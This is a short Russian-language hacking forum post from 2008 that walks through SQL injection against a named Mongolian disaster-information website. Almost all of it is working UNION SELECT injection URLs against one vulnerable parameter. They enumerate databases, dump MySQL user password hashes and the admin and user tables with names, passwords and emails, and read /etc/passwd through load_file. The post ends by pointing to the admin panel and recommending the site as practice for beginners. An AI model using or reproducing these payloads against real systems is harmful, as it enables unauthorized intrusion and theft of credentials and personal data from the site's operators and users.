06.08.2008, 00:44
|
|
Новичок
Регистрация: 24.07.2008
Сообщений: 29
С нами:
9367310
Репутация:
52
|
|
http://www.disasterinfo.mn
version() = 5.0.22-Debian_0ubuntu6.06-log
user() = root@localhost
database() = forum
смотрим все таблички
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_name,3 ,4,5+from+information_schema.tables/*
теперь смотрим все базы
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,table_schema ,3,4,5+from+information_schema.tables/*
есть хорошие таблички disasterinfo.users, main_data2.admin
так же есть доступ к mysql.user
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,user,password),3,4,5+from+mysql.user/*
есть права на чтение файлов)
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,2,load_file( 0x2f6574632f706173737764),4,5+from+main_data2.admi n/*
переходим к таблицам...
таблица с админами:
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,id,name,pass,email),3,4,5+from+main_data2.admin/*
таблица с юзерами :
http://www.disasterinfo.mn/forum/answer_input.php?id=12+union+select+1,concat_ws(0x 3a,nickname,password),3,4,5+from+disasterinfo.user s/*
админка тут http://www.disasterinfo.mn/admin/
прекрасная база,для тренировки новичкам)
спасибо за внимание)
|
|
|